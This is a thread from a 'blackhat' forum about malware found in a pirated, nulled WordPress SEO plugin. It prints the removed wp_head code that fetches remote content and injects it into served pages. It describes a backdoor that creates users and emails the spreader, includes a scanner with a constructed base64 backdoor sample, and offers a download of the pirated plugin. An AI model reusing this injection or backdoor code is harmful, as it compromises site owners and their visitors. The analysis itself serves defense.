Best Blackhat Forum

Full Version: [GET] SEO Pressor - Best SEO Wordpress Plugin v5.0 Nulled **FIXED**
How can a WP plugin be infected with a virus, trojan... if it's not an .exe file like software?
(04-29-2013 06:29 PM)simey69 Wrote: Hi,
I will check it and past back soon

cheers,
Si
How about your site login details being handed over to a hacker/coder,
or corrupting your wp site... or some nasty unwanted message
posted on your site!
Infected plugins can do that!
Right now...

There is one very common infection of wp plugins and themes: it fetches offsite content from another (host) site and injects that content into the page as the visitor sees it.
I've seen payloads vary from simple backlinks, adverts and cpa actions right up to Blackhole virus delivery.
This infection will not damage or hurt your wp installation, as the action of the payload is towards the visitor.
It can hurt your site by getting it flagged as a dangerous site, seen as spammy due to the content, or causing you to lose visitors.
We typically refer to this as a wp_head infection, as that is the mechanism mostly used to inject the code into the served page, but very similar mechanisms are also used.
This infection may live in any part of the plugin or theme, but is typically in functions.php.

A lesser known and more devious infection creates a new user on your site, then emails the infection spreader with a quick message to let them know you've been hit.
After that, it's a manual process of them coming to your site and doing what they want really...
That may be breaking your site or infecting it, then offering to fix it for a fee.
It may be a total site hijack, locking you out.
It may be to allow them to add content, plugins etc. to scatter their backlinks, adverts, cpa campaigns etc.
One of these I reported yesterday was encoded in the plugin (typical) but blended with the actual code of the plugin too, so simply removing the encrypted data would break the wp installation.
So yes, you can do a lot of damage to a wp installation via a plugin or theme.

The idiot scammers that do this vary from dead-head script kiddies that can't even copy the infection properly, so breaking the plugin/theme even before the code can do its thing, right up to more intelligent attempts that try really hard to hide their tracks and avoid detection.

Right now, as far as I'm concerned, the only real way to scan and clean them is manually. VT and other scanners are useless against such infections, as it looks like usual safe code if done correctly; the muppets that heavily encode it usually trigger an obfuscated script alert, giving it away a little...

The people that get banned share many infected files, usually using the same mechanism and same host domain for the payload code that is fetched.
The date of the infection can be spotted in the archive and is usually within an hour or so to a few days of their share date.

Hope that helps a little?

Si
Great work! Good luck!
** URGENT UPDATE **
Thanks to Jaffy, another infection inside the share has been questioned and found to be present.
It is an email infection, creating a new user and informing the scammer behind the infection that the backdoor has been created.
This infection sends an email with the subject 'Wordpress Plugin covertplayer' to
Code:
phillychad@gmx.com
Obviously, feel free to abuse and destroy that email user as much as possible...

To check if you have been hit:
Check your wp installation for a user called "wordpress".
If found, at least change that user's password; even better, delete it totally.
Then check for any unexpected posts, plugins, theme changes etc.

new CLEANED version available here:

Code:
http://www.sendspace.com/file/pedayz
password.. bestblackhatforum

There are a few of these threads about, so I've repeated this post on the other one too, to ensure the clean release is available.

Cheers,
Si
Hi Simey,
I just downloaded and unzipped it, and this looks exactly the same as the version I originally downloaded, with the base64-encoded central.class php. What's been cleaned?
Hi,

I've just checked the before and after versions.
The one I shared has the infection removed from seo-pressor.php (near the base of the file).
Code removed:
Code:
//Adds JQuery dependency.   <- comment planted by the infection; nothing here touches jQuery
function wp__head() {
    if (function_exists('curl_init')) {
        $ch = curl_init();
        // fetch offsite content from the payload host (note the jQuery lookalike domain)
        curl_setopt($ch, CURLOPT_URL, "http://www.jqury.net/?1");
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        // the infected site's own hostname is sent as the Referer
        curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
        $data = curl_exec($ch);
        curl_close($ch);
        // whatever was fetched is echoed, unfiltered, into the <head> of every served page
        echo "$data";
    }
}
// hooks the fetch-and-inject function into wp_head, so it runs on every page load
add_action('wp_head', 'wp__head');

I'm just checking the central.class file now, will report back asap

Cheers,
Si
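As an added example that is not part of the thread (not Si's code and not the plugin's), here is a small Python scanner for the two patterns described above: the wp_head remote fetch-and-echo, and the base64-wrapped user-creation/email backdoor found in the encoded class file. The sample sources, the remote host and the mail addresses are constructed placeholders, and the rule set is this example's own assumption about what such infections look like.

```python
import base64
import re

# Constructed samples that mimic the two infection patterns Si describes (not the real plugin
# files); the remote host and mail addresses are placeholders.
INFECTED_HEAD = """function wp__head() {
  $ch = curl_init();
  curl_setopt($ch, CURLOPT_URL, "http://attacker.example.invalid/?1");
  $data = curl_exec($ch);
  echo "$data";
}
add_action('wp_head', 'wp__head');"""
BACKDOOR_PLAIN = ("wp_create_user('wordpress', 'P@ss', 'x@example.invalid'); "
                  "mail('scammer@example.invalid', 'Wordpress Plugin covertplayer', 'ready');")
INFECTED_CLASS = "eval(base64_decode('%s'));" % base64.b64encode(BACKDOOR_PLAIN.encode()).decode()
# Building-block patterns; a finding needs a suspicious combination, not a single hit.
RULES = {
    "remote_fetch": re.compile(r"curl_init\s*\(|(file_get_contents|fopen)\s*\(\s*['\"]https?://"),
    "echo_var": re.compile(r"echo\s+['\"]?\$\w+"),
    "wp_head_hook": re.compile(r"add_action\s*\(\s*['\"]wp_head['\"]"),
    "user_create": re.compile(r"\b(wp_create_user|wp_insert_user)\s*\("),
    "mail_out": re.compile(r"\b(wp_mail|mail)\s*\("),
    "eval_decode": re.compile(r"eval\s*\(\s*(base64_decode|gzinflate|str_rot13)\s*\("),
}
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{40,}={0,2})['\"]")

def unwrap(src, depth=3):
    """Return src plus every base64 string literal in it, decoded a few layers deep."""
    layers = [src]
    for _ in range(depth):
        decoded = []
        for chunk in B64_LITERAL.findall(layers[-1]):
            try:
                decoded.append(base64.b64decode(chunk, validate=True).decode("utf-8", "replace"))
            except ValueError:
                pass  # long but non-base64 literal (e.g. a hash): ignore it
        if not decoded:
            break
        layers.append("\n".join(decoded))
    return "\n".join(layers)

def scan(src):
    """Return the infection patterns found in one plugin or theme source file."""
    hits = {name for name, rule in RULES.items() if rule.search(unwrap(src))}
    findings = []
    if {"remote_fetch", "echo_var", "wp_head_hook"} <= hits:
        findings.append("wp_head remote content injection")
    if {"user_create", "mail_out"} <= hits:
        findings.append("user creation backdoor with email callback")
    if "eval_decode" in hits:
        findings.append("eval of encoded payload")
    return findings
```

Run scan() over each .php file under wp-content/plugins and wp-content/themes; a file that only hooks wp_head to enqueue a script produces no finding, while the fetch-and-echo combination or a decoded user-creation plus mail call does.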
OK, yes, the central class encoded code did hold a further infection.
It's an email infection, creating a new user and contacting the scammer who spreads it.
Please see my modified post here:

http://bestblackhatforum.com/Thread-GET-...#pid371579

for the fully cleaned code and an explanation of how to check whether you have been hit by this attack.

+Rep to jaffy for raising the alert

Cheers,
Si
Tnh man :)
Thanks Si
Looks and installs great. No extra users!
Thanks for your hard work and response. Rep added.